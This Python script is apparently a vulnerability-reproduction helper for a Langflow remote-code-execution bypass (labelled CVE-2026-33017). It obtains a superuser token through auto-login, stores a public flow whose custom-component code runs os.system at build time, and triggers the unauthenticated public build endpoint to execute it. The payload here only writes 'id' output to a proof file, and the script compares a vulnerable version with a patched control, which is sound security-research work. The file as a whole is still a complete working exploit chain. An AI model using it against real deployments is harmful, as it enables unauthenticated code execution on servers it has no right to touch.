#!/usr/bin/env python3
"""CVE-2026-33017 VARIANT/BYPASS exploit helper - runs INSIDE the langflow container.

Invoked by bundle/vuln_variant/reproduction_steps.sh via:
    docker exec -e ROLE=<role> -e TOKEN=<token> -e MODE=<mode> <container> \
        python3 /tmp/variant_attempt.py

Bypass strategy (defeats the v1.9.0 "fix"):
  The v1.9.0 fix for CVE-2026-33017 removed the client-supplied `data` parameter
  from POST /api/v1/build_public_tmp/{flow_id}/flow and hardcoded data=None so the
  public build loads the flow definition from the database. The only gate it added
  is validate_flow_for_current_settings(flow.data), which is a NO-OP under the
  default allow_custom_components=true. Therefore an attacker who can create a
  PUBLIC flow whose stored `data` carries a custom component with arbitrary code
  can still obtain unauthenticated RCE: the public build loads that stored
  (malicious) flow from the DB and exec()'s the node's `code` via
  prepare_global_scope()/eval_custom_component_code at graph-build time.

  This is exactly the gap the upstream follow-up commit
  626365f088 "fix(security): run trusted server code on unauthenticated public
  flow builds" (released in v1.10.1, NOT in v1.9.0) was issued to close.

MODE=bypass (default; MODE is only echoed in the JSON result, it does not alter the steps):
  1. Wait for /health
  2. GET /api/v1/auto_login  -> access_token (AUTO_LOGIN=true, no credentials)
  3. POST /api/v1/flows/      -> create a PUBLIC flow whose STORED data contains
     a CustomComponent node with a top-level `_rce = os.system(...)` payload
  4. POST /api/v1/build_public_tmp/{flow_id}/flow with only a client_id cookie
     and NO `data` in the body (the server loads the stored malicious flow)
  5. Poll for /tmp/rce-proof and emit a JSON result on stdout

Expected:
  - langflow 1.9.0 (CVE "fixed" version): proof written  -> BYPASS CONFIRMED
  - langflow 1.10.1 (follow-up fix):      no proof / 400  -> closed (control)
"""
import json
import os
import sys
import time
import urllib.error
import urllib.request

# Base URL that req() prefixes to every request path (loopback inside the container).
BASE = "http://127.0.0.1:7860"
# Per-run marker: embedded in the flow name, the client_id cookie and the proof text.
TOKEN = os.getenv("TOKEN", "variant")
# ROLE and MODE are supplied by the calling script and echoed back in the JSON result.
ROLE = os.getenv("ROLE", "vuln")
MODE = os.getenv("MODE", "bypass")
# File the payload writes to and main() polls for.
PROOF = "/tmp/rce-proof"


def req(method, path, headers=None, body=None, timeout=30):
    """Send one HTTP request to the API at ``BASE`` and return ``(status, text)``.

    Args:
        method: HTTP verb, e.g. ``"GET"`` or ``"POST"``.
        path: Request path, appended verbatim to ``BASE``.
        headers: Optional dict of request headers.
        body: Optional JSON-serialisable object; when not None it is sent as
            UTF-8 encoded JSON.
        timeout: Socket timeout in seconds handed to ``urlopen``.

    Returns:
        A ``(status, text)`` tuple. ``text`` is the response body decoded as
        UTF-8 with undecodable bytes replaced. HTTP error responses are
        returned with their status code rather than raised. Any transport-level
        failure yields ``(0, str(exc))``.
    """
    url = BASE + path
    data = json.dumps(body).encode("utf-8") if body is not None else None
    r = urllib.request.Request(url, data=data, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(r, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        # Must come first: HTTPError is a subclass of URLError/OSError.
        return e.code, e.read().decode("utf-8", "replace")
    except OSError as e:
        # URLError is an OSError, so connection failures are still covered.
        # Catching OSError additionally covers errors urlopen does not wrap,
        # such as a timeout while reading the body or the peer dropping the
        # connection after the request was sent, so callers always get a tuple.
        return 0, str(e)


def wait_health(timeout=240):
    """Poll ``GET /health`` until it answers 200 or ``timeout`` seconds elapse.

    Args:
        timeout: Overall budget in seconds. A value <= 0 returns False without
            issuing any request.

    Returns:
        True as soon as a probe returns HTTP 200, otherwise False once the
        budget is exhausted.
    """
    # Monotonic clock: the deadline must not move if the wall clock is adjusted.
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            st, _ = req("GET", "/health", timeout=10)
            if st == 200:
                return True
        except Exception:
            # Deliberate best-effort: any probe failure while the server is
            # still starting just means "not healthy yet"; retry until deadline.
            pass
        time.sleep(2)
    return False


def make_malicious_flow(token):
    """Build the graph dict for a flow with one CustomComponent proof node.

    The node's `code` template field carries a top-level assignment
    `_rce = os.system(...)`. It is an ast.Assign node which, per this file's
    module docstring, prepare_global_scope() collects and exec()'s at
    graph-build time, before any component method runs.

    Args:
        token: Marker string interpolated into the shell command so the proof
            file can be tied to this run.

    Returns:
        A dict of the form ``{"nodes": [node], "edges": []}`` suitable for the
        ``data`` field of a flow-creation request.
    """
    # The command writes `id` output to PROOF, then appends a line containing
    # the token as a second step.
    # NOTE(review): `token` is interpolated without escaping inside single
    # quotes; a token containing quote characters would break the command.
    code = (
        "from langflow.custom import Component\n"
        "from langflow.io import MessageTextInput, Output\n"
        "from langflow.schema import Data\n"
        "import os\n"
        f"_rce = os.system(\"id > {PROOF} 2>&1 && echo 'RCE_CONFIRMED {token}' >> {PROOF}\")\n"
        "\n"
        "class RCEComponent(Component):\n"
        '    display_name = "RCE Component"\n'
        '    description = "demo"\n'
        '    icon = "custom_components"\n'
        '    inputs = [MessageTextInput(name="input_value", display_name="Input")]\n'
        '    outputs = [Output(display_name="Output", name="output", method="build_output")]\n'
        "    def build_output(self) -> Data:\n"
        "        return Data(value=self.input_value)\n"
    )
    # Node metadata mirrors the class defined in `code` (same display name,
    # output name/method and input field name).
    node = {
        "id": "CustomComponent-rce-1",
        "type": "CustomComponent",
        "data": {
            "id": "CustomComponent-rce-1",
            "type": "RCEComponent",
            "node": {
                "base_classes": ["Data"],
                "display_name": "RCE Component",
                "description": "demo",
                "icon": "custom_components",
                "outputs": [
                    {
                        "display_name": "Output",
                        "name": "output",
                        "method": "build_output",
                        "types": ["Data"],
                        "cache": True,
                        "allows_loop": False,
                        "group_outputs": False,
                        "hidden": None,
                        "loop_types": None,
                        "options": None,
                        "required_inputs": None,
                        "selected": "Data",
                        "tool_mode": False,
                        "value": "__UNDEFINED__",
                    }
                ],
                "template": {
                    "_type": "Component",
                    # The component source travels in the `code` field's value.
                    "code": {
                        "type": "code",
                        "value": code,
                        "required": True,
                        "dynamic": True,
                        "show": True,
                        "advanced": True,
                        "multiline": True,
                        "name": "code",
                        "display_name": "Code",
                    },
                    "input_value": {
                        "_input_type": "MessageTextInput",
                        "type": "str",
                        "name": "input_value",
                        "display_name": "Input",
                        "value": "hello",
                        "required": False,
                        "show": True,
                    },
                },
            },
        },
    }
    # Single node, no edges.
    return {"nodes": [node], "edges": []}


def _fail(result, message):
    """Record ``message`` as the error, print ``result`` as JSON and exit 1."""
    result["error"] = message
    print(json.dumps(result))
    sys.exit(1)


def _json_field(body, key):
    """Return ``key`` from a JSON-object ``body``; None if missing or unparsable."""
    try:
        parsed = json.loads(body)
    except ValueError:
        return None
    if not isinstance(parsed, dict):
        return None
    return parsed.get(key)


def _read_proof():
    """Return the stripped contents of PROOF, or None if it does not exist yet."""
    try:
        with open(PROOF, encoding="utf-8", errors="replace") as fh:
            return fh.read().strip()
    except FileNotFoundError:
        return None


def main():
    """Run the reproduction end to end and report the outcome as JSON.

    Prints exactly one JSON object on stdout and exits with status 0 when the
    proof file exists and contains TOKEN, otherwise with status 1. Every
    early-failure path sets ``result["error"]`` before exiting.
    """
    result = {"role": ROLE, "mode": MODE, "token": TOKEN, "endpoint": "public_stored", "error": None}

    # Start from a clean slate so a stale proof file cannot fake a success.
    try:
        os.remove(PROOF)
    except FileNotFoundError:
        pass

    if not wait_health():
        _fail(result, "health check failed")
    result["healthcheck_passed"] = True

    # 1. unauthenticated auto-login (AUTO_LOGIN=true issues a superuser session)
    st, body = req("GET", "/api/v1/auto_login")
    result["auto_login_status"] = st
    if st != 200:
        _fail(result, f"auto_login failed: {body[:200]}")
    access_token = _json_field(body, "access_token")
    if not access_token:
        _fail(result, "no access_token in auto_login response")
    # Only record that a token was obtained; the token itself is not echoed.
    result["access_token"] = True
    auth = {"Authorization": f"Bearer {access_token}", "Content-Type": "application/json"}

    # 2. Create a PUBLIC flow whose STORED data contains the custom component.
    #    The code lives in the DB, not in the build request.
    flow_body = {
        "name": f"bypass-flow-{TOKEN}",
        "data": make_malicious_flow(TOKEN),
        "access_type": "PUBLIC",
    }
    st, body = req("POST", "/api/v1/flows/", headers=auth, body=flow_body)
    result["create_flow_status"] = st
    if st not in (200, 201):
        _fail(result, f"create_flow failed: {body[:300]}")
    flow_id = _json_field(body, "id")
    if not flow_id:
        _fail(result, f"no flow id: {body[:300]}")
    result["flow_id"] = flow_id

    # 3. Trigger the unauthenticated public build with ONLY a client_id cookie
    #    and NO `data` in the body, so the server uses the stored flow.
    exploit_headers = {"Content-Type": "application/json", "Cookie": f"client_id={TOKEN}"}
    st, body = req("POST", f"/api/v1/build_public_tmp/{flow_id}/flow", headers=exploit_headers, body={})
    result["exploit_status"] = st
    result["exploit_body"] = body[:500]

    # 4. Poll for the proof file. The payload creates the file first and
    #    appends the token in a second command, so keep polling until the
    #    token is visible instead of stopping at first sight of the file.
    proof_content = None
    for _ in range(30):
        latest = _read_proof()
        if latest is not None:
            proof_content = latest
            if TOKEN in latest:
                break
        time.sleep(1)
    proof_exists = proof_content is not None

    result["proof_exists"] = proof_exists
    result["proof_content"] = proof_content
    result["success"] = bool(proof_exists and TOKEN in (proof_content or ""))
    print(json.dumps(result))
    sys.exit(0 if result["success"] else 1)


if __name__ == "__main__":
    main()
